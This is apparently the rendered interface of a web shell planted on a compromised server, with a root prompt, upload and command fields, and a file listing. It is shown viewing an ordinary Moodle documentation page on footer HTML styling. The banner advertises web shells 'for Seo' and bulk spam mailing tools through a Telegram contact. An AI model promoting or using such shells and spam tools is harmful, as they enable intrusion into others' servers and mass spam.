__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

root@216.73.217.120: ~ $
---
layout: docs
title: "Footer"
description: Moodle footer HTML and required code injected in the page footer
date: 2020-03-02T16:32:24+01:00
draft: false
weight: 40
tags:
- available
- needs review
---

## How are footers implemented in Moodle?

The page footer is shown at the bottom of every page in Moodle, typically a Moodle footer contains links to:

* A link to the Moodle docs for the current page
* resetting user tours
* user login information
* a link to the Moodle homepage

When the setting ```perfdebug``` is turned on (Site Administration > Development > Debugging) additional performance info is shown in the page footer.

## Footer styling

Since footers are repeated on all pages they are styled distinctly using a dark background colour and light fonts. Links need to be underlined and use light fonts too.

The page footer should always stick to the bottom of the page and never overlap any page content.

### Minimal footer requirements

The page footer is required to inject the page JavaScript, show the reset user tours link and show user info and (if avaliable) the contents of the user configure theme custom menu.

{{< example >}}
<footer id="page-footer" class="py-3 bg-dark text-light">
    <div class="container">
        <p class="helplink"><a href="#">Moodle docs for this page</a></p>
        You are logged in as <a href="#">Test User</a> (<a href="#">logout</a>)
        <a href="#">Home</a>
        <div class="tool_usertours-resettourcontainer"></div>
    </div>
</footer>
{{< /example >}}

Filemanager

Name Type Size Permission Actions
_index.md File 85 B 0644
actionmenu.md File 6.39 KB 0644
activityicons.md File 8.38 KB 0644
buttons.md File 5.9 KB 0644
coursecards.md File 6.26 KB 0644
dom-modal.md File 4.29 KB 0644
dropdowns.md File 13.23 KB 0644
dynamictabs.md File 2.87 KB 0644
example.md File 1.52 KB 0644
footer.md File 1.49 KB 0644
form-elements.md File 1.08 KB 0644
moodle-icons.md File 1.71 KB 0644
notifications.md File 2.55 KB 0644
search-input.md File 3.42 KB 0644
showmore.md File 1.18 KB 0644
toggle.md File 2.29 KB 0644
Filemanager